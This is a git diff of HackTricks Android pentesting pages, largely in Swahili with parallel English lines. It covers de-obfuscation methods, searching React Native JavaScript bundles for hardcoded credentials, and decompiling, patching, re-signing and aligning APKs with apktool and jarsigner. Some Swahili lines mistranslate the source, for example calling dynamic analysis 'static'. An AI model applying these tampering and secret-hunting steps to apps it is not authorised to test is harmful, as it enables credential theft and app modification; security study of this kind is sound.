Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Mbinu za **Kuondoa Ufichaji kwa Mikono**
## Manual **De-obfuscation Techniques**
Katika uwanja wa **usalama wa programu**, mchakato wa kufanya nambari iliyofichwa iwezeeleweka, unaojulikana kama **kuondoa ufichaji**, ni muhimu. Mwongozo huu unachunguza mikakati mbalimbali ya kuondoa ufichaji, ikilenga mbinu za uchambuzi wa tuli na kutambua mifano ya ufichaji. Aidha, inawasilisha zoezi la matumizi ya vitendo na inapendekeza rasilimali zaidi kwa wale wanaopenda kuchunguza mada za juu zaidi.
Katika eneo la **usalama wa programu**, mchakato wa kufanya msimbo uliofichwa kueleweka, unaojulikana kama **de-obfuscation**, ni muhimu. Mwongo huu unachunguza mikakati mbalimbali za de-obfuscation, ukizingatia mbinu za uchambuzi wa statiki na kutambua mifumo ya obfuscation. Aidha, inatoa zoezi la matumizi ya vitendo na inapendekeza rasilimali zaidi kwa wale wanaopenda kuchunguza mada za juu zaidi.
### Mikakati ya Uchambuzi wa Tuli wa Kuondoa Ufichaji
### **Strategies for Static De-obfuscation**
Wakati unashughulika na **nambari iliyofichwa**, mikakati kadhaa inaweza kutumika kulingana na asili ya ufichaji:
Wakati wa kushughulika na **obfuscated code**, mikakati kadhaa inaweza kutumika kulingana na asili ya obfuscation:
- **Nambari ya DEX (Java)**: Njia moja yenye ufanisi ni kutambua njia za kuondoa ufichaji za programu, kisha kuiga njia hizi katika faili ya Java. Faili hii inatekelezwa ili kurejesha ufichaji kwenye vipengele vilivyolengwa.
- **Nambari ya Java na Nambari ya Asili**: Njia nyingine ni kutafsiri algorithm ya kuondoa ufichaji katika lugha ya skrini kama Python. Mkakati huu unasisitiza kwamba lengo kuu si kuelewa kabisa algorithm lakini kuitekeleza kwa ufanisi.
- **DEX bytecode (Java)**: Njia moja yenye ufanisi ni kutambua mbinu za de-obfuscation za programu, kisha kuiga mbinu hizi katika faili la Java. Faili hii inatekelezwa ili kubadilisha obfuscation kwenye vipengele vilivyokusudiwa.
- **Java na Msimbo wa Asili**: Njia nyingine ni kutafsiri algorithimu ya de-obfuscation kuwa lugha ya skripti kama Python. Mikakati hii inaonyesha kwamba lengo kuu si kuelewa kabisa algorithimu bali kuitekeleza kwa ufanisi.
### Kutambua Ufichaji
### **Identifying Obfuscation**
Kutambua nambari iliyofichwa ni hatua ya kwanza katika mchakato wa kuondoa ufichaji. Ishara muhimu ni pamoja na:
Kutambua msimbo uliofichwa ni hatua ya kwanza katika mchakato wa de-obfuscation. Viashiria muhimu ni pamoja na:
- **Kutokuwepo au kuchanganyikiwa kwa herufi** katika Java na Android, ambayo inaweza kuashiria ufichaji wa herufi.
- **Kuwepo kwa faili za binary** katika saraka ya mali au wito wa `DexClassLoader`, unaonyesha kufungua na kupakia nambari kwa njia ya kudumu.
- Matumizi ya **maktaba za asili pamoja na kazi za JNI zisizoweza kutambulika**, zinazoashiria ufichaji wa njia za asili.
- **ukosefu au kuchanganya kwa nyuzi** katika Java na Android, ambayo inaweza kuashiria obfuscation ya nyuzi.
- **uwepo wa faili za binary** katika saraka ya mali au wito kwa `DexClassLoader`, ukionyesha unpacking ya msimbo na upakiaji wa dynamic.
- Matumizi ya **maktaba za asili pamoja na kazi za JNI zisizoweza kutambulika**, zikionyesha uwezekano wa obfuscation ya mbinu za asili.
## Uchambuzi wa Tuli katika Kuondoa Ufichaji
## **Dynamic Analysis in De-obfuscation**
Kwa kutekeleza nambari katika mazingira yaliyodhibitiwa, uchambuzi wa tuli **kuruhusu uchunguzi wa jinsi nambari iliyofichwa inavyotenda wakati halisi**. Mbinu hii ni muhimu sana katika kugundua jinsi mifumo ya ufichaji ngumu iliyoundwa kuficha nia halisi ya nambari inavyofanya kazi.
Kwa kutekeleza msimbo katika mazingira yaliyodhibitiwa, uchambuzi wa dynamic **unaruhusu kuangalia jinsi msimbo uliofichwa unavyofanya kazi kwa wakati halisi**. Njia hii ni yenye ufanisi hasa katika kufichua kazi za ndani za mifumo tata ya obfuscation ambayo imeundwa kuficha nia halisi ya msimbo.
### Matumizi ya Uchambuzi wa Tuli
### **Applications of Dynamic Analysis**
- **Ufichuaji wa Wakati wa Uendeshaji**: Mbinu nyingi za ufichaji zinahusisha kusimbua herufi au sehemu za nambari ambazo zinafichuliwa tu wakati wa uendeshaji. Kupitia uchambuzi wa tuli, vipengele hivi vilivyofichwa vinaweza kukamatwa wakati wa ufichuaji, kufunua umbo lao halisi.
- **Kutambua Mbinu za Ufichaji**: Kwa kufuatilia tabia ya programu, uchambuzi wa tuli unaweza kusaidia kutambua mbinu maalum za ufichaji zinazotumiwa, kama vile utekelezaji wa nambari kwa njia ya kubadilisha, pakiti, au kizazi cha nambari kwa njia ya kudumu.
- **Kugundua Utendaji Uliofichwa**: Nambari iliyofichwa inaweza kuwa na utendaji uliofichwa ambao haueleweki kupitia uchambuzi wa tuli pekee. Uchambuzi wa tuli unaruhusu uchunguzi wa njia zote za nambari, pamoja na zile zinazotekelezwa kwa masharti, ili kugundua utendaji uliofichwa kama huo.
- **Runtime Decryption**: Mbinu nyingi za obfuscation zinajumuisha kuandika nyuzi au sehemu za msimbo ambazo zinafichwa tu wakati wa utekelezaji. Kupitia uchambuzi wa dynamic, vipengele hivi vilivyoandikwa vinaweza kukamatwa wakati wa ufichuzi, vikifunua sura zao halisi.
- **Identifying Obfuscation Techniques**: Kwa kufuatilia tabia ya programu, uchambuzi wa dynamic unaweza kusaidia kutambua mbinu maalum za obfuscation zinazotumika, kama vile virtualization ya msimbo, packers, au uzalishaji wa msimbo wa dynamic.
- **Uncovering Hidden Functionality**: Msimbo uliofichwa unaweza kuwa na kazi zilizofichwa ambazo hazionekani kupitia uchambuzi wa statiki pekee. Uchambuzi wa dynamic unaruhusu kuangalia njia zote za msimbo, ikiwa ni pamoja na zile zinazotekelezwa kwa masharti, ili kufichua kazi hizo zilizofichwa.
## Marejeo na Kusoma Zaidi
## References and Further Reading
* [https://maddiestone.github.io/AndroidAppRE/obfuscation.html](https://maddiestone.github.io/AndroidAppRE/obfuscation.html)
* BlackHat USA 2018: "Unpacking the Packed Unpacker: Reverse Engineering an Android Anti-Analysis Library" \[[video](https://www.youtube.com/watch?v=s0Tqi7fuOSU)]
* Mazungumzo haya yanajadili mbinu za kuondoa ufichaji, hasa katika nambari ya asili ya Java, ambayo maktaba ya Android ya kudukua ilikuwa ikitumia kuficha tabia yake.
* REcon 2019: "The Path to the Payload: Android Edition" \[[video](https://recon.cx/media-archive/2019/Session.005.Maddie_Stone.The_path_to_the_payload_Android_Edition-J3ZnNl2GYjEfa.mp4)]
* Mazungumzo haya yanajadili mfululizo wa mbinu za ufichaji, kwa kutumia nambari ya Java pekee, ambazo botnet ya Android ilikuwa ikitumia kuficha tabia yake.
* BlackHat USA 2018: “Unpacking the Packed Unpacker: Reverse Engineering an Android Anti-Analysis Library” \[[video](https://www.youtube.com/watch?v=s0Tqi7fuOSU)]
* Hotuba hii inazungumzia uhandisi wa nyuma wa moja ya maktaba za asili za anti-analysis ngumu zaidi nilizoshuhudia zikitumika na programu ya Android. Inashughulikia hasa mbinu za obfuscation katika msimbo wa asili.
* REcon 2019: “The Path to the Payload: Android Edition” \[[video](https://recon.cx/media-archive/2019/Session.005.Maddie_Stone.The_path_to_the_payload_Android_Edition-J3ZnNl2GYjEfa.mp4)]
* Hotuba hii inajadili mfululizo wa mbinu za obfuscation, pekee katika msimbo wa Java, ambazo botnet ya Android ilikuwa ikitumia kuficha tabia yake.
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

64
mobile-pentesting/android-app-pentesting/react-native-application.md
View file

@ -1,62 +1,64 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
# Uchambuzi wa Programu ya React Native
Ili kuthibitisha ikiwa programu imejengwa kwa mfumo wa React Native, fuata hatua hizi:
Ili kuthibitisha kama programu ilijengwa kwenye mfumo wa React Native, fuata hatua hizi:
1. Badilisha jina la faili ya APK na kurefusha kuwa zip na kuitoa kwenye folda mpya kwa kutumia amri `cp com.example.apk example-apk.zip` na `unzip -qq example-apk.zip -d ReactNative`.
1. Badilisha jina la faili la APK kwa kiambishi cha zip na uondoe kwenye folda mpya kwa kutumia amri `cp com.example.apk example-apk.zip` na `unzip -qq example-apk.zip -d ReactNative`.
2. Nenda kwenye folda ya ReactNative iliyoundwa na tafuta folda ya mali. Ndani ya folda hii, unapaswa kupata faili `index.android.bundle`, ambayo ina JavaScript ya React iliyopunguzwa kwa muundo mdogo.
2. Tembea kwenye folda mpya iliyoundwa ya ReactNative na pata folda ya mali. Ndani ya folda hii, unapaswa kupata faili `index.android.bundle`, ambayo ina JavaScript ya React katika muundo wa minified.
3. Tumia amri `find . -print | grep -i ".bundle$"` kutafuta faili ya JavaScript.
3. Tumia amri `find . -print | grep -i ".bundle$"` kutafuta faili la JavaScript.
Ili kuchambua zaidi nambari ya JavaScript, tengeneza faili iitwayo `index.html` kwenye saraka hiyo hiyo na nambari ifuatayo:
Ili kuchambua zaidi msimbo wa JavaScript, tengeneza faili lililo na jina `index.html` katika saraka hiyo hiyo lenye msimbo ufuatao:
```html
<script src="./index.android.bundle"></script>
```
Unaweza kupakia faili kwenye [https://spaceraccoon.github.io/webpack-exploder/](https://spaceraccoon.github.io/webpack-exploder/) au fuata hatua hizi:
You can upload the file to [https://spaceraccoon.github.io/webpack-exploder/](https://spaceraccoon.github.io/webpack-exploder/) or follow these steps:
1. Fungua faili ya `index.html` kwenye Google Chrome.
1. Fungua faili la `index.html` katika Google Chrome.
2. Fungua Jopo la Watengenezaji kwa kubonyeza **Command+Option+J kwa OS X** au **Control+Shift+J kwa Windows**.
2. Fungua Developer Toolbar kwa kubonyeza **Command+Option+J kwa OS X** au **Control+Shift+J kwa Windows**.
3. Bonyeza "Sources" kwenye Jopo la Watengenezaji. Unapaswa kuona faili ya JavaScript iliyogawanyika katika folda na faili, ambazo zinaunda pakiti kuu.
3. Bonyeza "Sources" katika Developer Toolbar. Unapaswa kuona faili la JavaScript ambalo limegawanywa katika folda na faili, likiunda bundle kuu.
Ikiwa utapata faili inayoitwa `index.android.bundle.map`, utaweza kuchambua nambari ya chanzo katika muundo usiofupishwa. Faili za ramani zina habari za kufuatilia chanzo, ambazo zinaruhusu kuweka alama vitambulisho vilivyofupishwa.
If you find a file called `index.android.bundle.map`, you will be able to analyze the source code in an unminified format. Map files contain source mapping, which allows you to map minified identifiers.
Kutafuta vitambulisho na sehemu nyeti, fuata hatua hizi:
To search for sensitive credentials and endpoints, follow these steps:
1. Tambua maneno muhimu ya kutathmini nambari ya JavaScript. Programu za React Native mara nyingi hutumia huduma za watu wa tatu kama vile Firebase, AWS S3, funguo za faragha, nk.
1. Tambua maneno muhimu nyeti ili kuchambua msimbo wa JavaScript. Programu za React Native mara nyingi hutumia huduma za watu wengine kama Firebase, AWS S3 service endpoints, funguo za kibinafsi, n.k.
2. Katika kesi hii maalum, iligundulika kuwa programu ilikuwa ikatumia huduma ya Dialogflow. Tafuta muundo unaohusiana na usanidi wake.
2. Katika kesi hii maalum, programu ilionekana ikitumia huduma ya Dialogflow. Tafuta muundo unaohusiana na usanidi wake.
3. Ilikuwa bahati kwamba vitambulisho nyeti vilivyofungwa kwa nguvu vilipatikana katika nambari ya JavaScript wakati wa mchakato wa uchunguzi.
3. Ilikuwa na bahati kwamba akreditif nyeti zilizowekwa kwa mikono zilipatikana katika msimbo wa JavaScript wakati wa mchakato wa recon.
## Marejeo
## References
* [https://medium.com/bugbountywriteup/lets-know-how-i-have-explored-the-buried-secrets-in-react-native-application-6236728198f7](https://medium.com/bugbountywriteup/lets-know-how-i-have-explored-the-buried-secrets-in-react-native-application-6236728198f7)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au **kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

578
mobile-pentesting/android-app-pentesting/smali-changes.md
View file

@ -1,97 +1,98 @@
# Smali - Kudecompile/\[Kubadilisha]/Kukusanya
# Smali - Decompiling/\[Modifying]/Compiling
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
Marafiki, mara nyingine inakuwa ya kuvutia kubadilisha nambari ya programu ili kupata habari iliyofichwa kwako (labda nywila zilizofichwa vizuri au bendera). Kwa hivyo, inaweza kuwa ya kuvutia kudecompile apk, kubadilisha nambari na kuijumuisha tena.
Wakati mwingine ni ya kuvutia kubadilisha msimbo wa programu ili kupata habari zilizofichwa kwako (labda nywila au bendera zilizofichwa vizuri). Kisha, inaweza kuwa ya kuvutia decompile apk, kubadilisha msimbo na kuirekebisha.
**Marejeleo ya Opcodes:** [http://pallergabor.uw.hu/androidblog/dalvik\_opcodes.html](http://pallergabor.uw.hu/androidblog/dalvik\_opcodes.html)
**Opcodes reference:** [http://pallergabor.uw.hu/androidblog/dalvik\_opcodes.html](http://pallergabor.uw.hu/androidblog/dalvik\_opcodes.html)
## Njia ya Haraka
## Fast Way
Kwa kutumia **Visual Studio Code** na kifaa cha [APKLab](https://github.com/APKLab/APKLab), unaweza **kudecompile kiotomatiki**, kubadilisha, **kukusanya**, saini na kusakinisha programu bila kutekeleza amri yoyote.
Kwa kutumia **Visual Studio Code** na kiendelezi cha [APKLab](https://github.com/APKLab/APKLab), unaweza **decompile kiotomatiki**, kubadilisha, **kuirekebisha**, kusaini na kufunga programu bila kutekeleza amri yoyote.
Script nyingine inayofanikisha sana kazi hii ni [**https://github.com/ax/apk.sh**](https://github.com/ax/apk.sh)
**Script** nyingine inayorahisisha kazi hii sana ni [**https://github.com/ax/apk.sh**](https://github.com/ax/apk.sh)
## Kudecompile APK
## Decompile the APK
Kwa kutumia APKTool unaweza kupata **nambari ya smali na rasilimali**:
Kwa kutumia APKTool unaweza kufikia **smali code and resources**:
```bash
apktool d APP.apk
```
Ikiwa **apktool** inakupa kosa lolote, jaribu [kusanikisha **toleo jipya zaidi**](https://ibotpeaches.github.io/Apktool/install/)
Baadhi ya **faili za kuvutia unazopaswa kutazama ni**:
Baadhi ya **faili za kuvutia unapaswa kuangalia ni**:
* _res/values/strings.xml_ (na xml zote ndani ya res/values/\*)
* _AndroidManifest.xml_
* Faili yoyote yenye kipengee cha _.sqlite_ au _.db_
* Faili yoyote yenye kiendelezi _.sqlite_ au _.db_
Ikiwa `apktool` ina **matatizo ya kudekodea programu**, angalia [https://ibotpeaches.github.io/Apktool/documentation/#framework-files](https://ibotpeaches.github.io/Apktool/documentation/#framework-files) au jaribu kutumia hoja ya **`-r`** (Usikodee rasilimali). Kisha, ikiwa tatizo lilikuwa kwenye rasilimali na sio kwenye nambari ya chanzo, hautakuwa na tatizo hilo (pia hautakodea rasilimali).
Ikiwa `apktool` ina **shida katika kufungua programu** angalia [https://ibotpeaches.github.io/Apktool/documentation/#framework-files](https://ibotpeaches.github.io/Apktool/documentation/#framework-files) au jaribu kutumia hoja **`-r`** (Usifungue rasilimali). Kisha, ikiwa shida ilikuwa katika rasilimali na si katika msimbo wa chanzo, hutakuwa na shida hiyo (hutaweza pia kufungua rasilimali).
## Badilisha nambari ya smali
## Badilisha msimbo wa smali
Unaweza **kubadilisha** **maagizo**, kubadilisha **thamani** ya baadhi ya variables au **kuongeza** maagizo mapya. Mimi hubadilisha nambari ya Smali kwa kutumia [**VS Code**](https://code.visualstudio.com), kisha unasakinisha **smalise extension** na mhariri utakuambia ikiwa kuna **maagizo yoyote yasiyo sahihi**.\
Baadhi ya **mifano** inaweza kupatikana hapa:
Unaweza **kubadilisha** **maagizo**, kubadilisha **thamani** ya baadhi ya mabadiliko au **kuongeza** maagizo mapya. Ninabadilisha msimbo wa Smali kwa kutumia [**VS Code**](https://code.visualstudio.com), kisha unafunga **smalise extension** na mhariri atakuambia ikiwa kuna **agizo lolote lililo sahihi**.\
Baadhi ya **mfano** yanaweza kupatikana hapa:
* [Mifano ya mabadiliko ya Smali](smali-changes.md)
* [Google CTF 2018 - Shall We Play a Game?](google-ctf-2018-shall-we-play-a-game.md)
* [Google CTF 2018 - Je, Tutacheza Mchezo?](google-ctf-2018-shall-we-play-a-game.md)
Au unaweza [**angalia hapa chini maelezo ya mabadiliko ya Smali**](smali-changes.md#modifying-smali).
Au unaweza [**kuangalia hapa chini baadhi ya mabadiliko ya Smali yaliyoelezewa**](smali-changes.md#modifying-smali).
## Kurejesha tena APK
## Recompile APK
Baada ya kubadilisha nambari, unaweza **kurejesha** nambari kwa kutumia:
Baada ya kubadilisha msimbo unaweza **kurekebisha** msimbo kwa kutumia:
```bash
apktool b . #In the folder generated when you decompiled the application
```
Itakuwa **kuchakata** APK mpya **ndani** ya folda ya _**dist**_.
It will **compile** the new APK **inside** the _**dist**_ folder.
Ikiwa **apktool** inatoa **kosa**, jaribu [kufunga **toleo jipya**](https://ibotpeaches.github.io/Apktool/install/)
If **apktool** throws an **error**, try[ installing the **latest version**](https://ibotpeaches.github.io/Apktool/install/)
### **Saini APK mpya**
### **Sign the new APK**
Kisha, unahitaji **kuzalisha ufunguo** (utaulizwa nenosiri na habari ambayo unaweza kujaza kwa nasibu):
Then, you need to **generate a key** (you will be asked for a password and for some information that you can fill randomly):
```bash
keytool -genkey -v -keystore key.jks -keyalg RSA -keysize 2048 -validity 10000 -alias <your-alias>
```
Hatimaye, **saini** APK mpya:
Hatimaye, **sign** APK mpya:
```bash
jarsigner -keystore key.jks path/to/dist/* <your-alias>
```
### Kuboresha programu mpya
### Optimize new application
**zipalign** ni zana ya kusawazisha nyaraka ambayo hutoa uboreshaji muhimu kwa faili za programu za Android (APK). [Maelezo zaidi hapa](https://developer.android.com/studio/command-line/zipalign).
**zipalign** ni chombo cha kuoanisha archive ambacho kinatoa uboreshaji muhimu kwa faili za programu za Android (APK). [More information here](https://developer.android.com/studio/command-line/zipalign).
```bash
zipalign [-f] [-v] <alignment> infile.apk outfile.apk
zipalign -v 4 infile.apk
```
### **Saini APK mpya (tena?)**
Ikiwa **unapendelea** kutumia [**apksigner**](https://developer.android.com/studio/command-line/) badala ya jarsigner, **unapaswa kusaini apk** baada ya kufanya **uboreshaji na** zipaling. LAKINI KUMBUKA KUWA UNAHITAJI **KUSAJILI KIUNGANISHI MARA MOJA** NA jarsigner (kabla ya zipalign) AU NA aspsigner (baada ya zipaling).
Ikiwa unataka kutumia [**apksigner**](https://developer.android.com/studio/command-line/) badala ya jarsigner, **unapaswa kusaini apk** baada ya kutumia **ukandamizaji na** zipalign. LAKINI KUMBUKA KWAMBA UNAPASWA **KUSAINI PROGRAMU KIMOJA TU** KWA jarsigner (kabla ya zipalign) AU KWA aspsigner (baada ya zipalign).
```bash
apksigner sign --ks key.jks ./dist/mycompiled.apk
```
## Kubadilisha Smali
Kwa msimbo wa Java wa Hello World ufuatao:
Kwa msimbo wa Hello World Java ufuatao:
```java
public static void printHelloWorld() {
System.out.println("Hello World")
}
```
Msimbo wa Smali ungekuwa:
Msimbo wa Smali utakuwa:
```java
.method public static printHelloWorld()V
.registers 2
@ -101,13 +102,13 @@ invoke-virtual {v0,v1}, Ljava/io/PrintStream;->println(Ljava/lang/String;)V
return-void
.end method
```
Seti ya maagizo ya Smali inapatikana [hapa](https://source.android.com/devices/tech/dalvik/dalvik-bytecode#instructions).
